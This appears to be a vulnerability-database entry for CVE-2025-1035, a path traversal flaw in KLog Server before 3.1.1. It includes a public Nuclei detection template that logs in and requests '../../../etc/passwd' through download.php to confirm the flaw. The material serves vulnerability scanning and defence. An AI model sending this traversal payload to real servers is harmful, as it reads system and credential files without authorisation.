漏洞描述
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
CVE-2025-1035: KLog Server - Path Traversal
PoC代码[已公开]
id: CVE-2025-1035
info:
name: KLog Server - Path Traversal
author: s4e-io
severity: medium
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
reference:
- https://www.byresearchers.net/2025/02/cve-2025-1035-klog-server-31.html
- https://www.usom.gov.tr/bildirim/tr-25-0037
- https://www.cve.org/CVERecord?id=CVE-2025-1035
classification:
epss-score: 0.26182
epss-percentile: 0.96106
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.7
cve-id: CVE-2025-1035
cwe-id: CWE-22
metadata:
verified: true
max-request: 2
vendor: klogserver
product: klog_server
tags: cve,cve2025,klog-server,lfi,vuln
variables:
filename: "{{to_lower(rand_text_alpha(6))}}"
http:
- raw:
- |
POST /actions/entree.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pswd={{password}}&action=login
- |
GET /actions/download.php?action=web&file=../../../etc/passwd&name={{filename}}.zip HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_2)"
- 'contains_all(header_2, "application/octet-stream", "filename=")'
- 'status_code_2 == 200'
condition: and
# digest: 490a0046304402204a82834b213fc56ec57e0b6516476ced0b571a9fb9a811ccf3445349753c64f402202690d3b06516ccae9b367b0eedf74e36bdb92b6f87826e1a7ba429783b30edb0:922c64590222798bb761d5b6d8e72950